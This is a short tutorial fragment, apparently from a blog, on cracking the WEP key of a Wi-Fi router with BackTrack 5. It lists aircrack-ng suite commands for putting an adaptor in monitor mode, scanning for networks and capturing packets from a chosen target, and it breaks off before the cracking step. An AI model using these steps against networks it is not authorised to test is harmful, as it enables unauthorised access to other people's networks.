How to recover WEP key on a Wifi Router using BackTrack 5
BackTrack > Open GUI Mode > Open Terminal Check wifi adaptor compatibility with “iwconfig” Put adaptor in monitor mode with “airmon-ng start wlan0″ Scan for networks with “airodump-ng mon0″ Find the “WEP” network you want to crack and copy it’s BSSID Capture packets with “airodump-ng -c <channel> -w <output filename> –bssid <bssid> mon0″ Open new [...]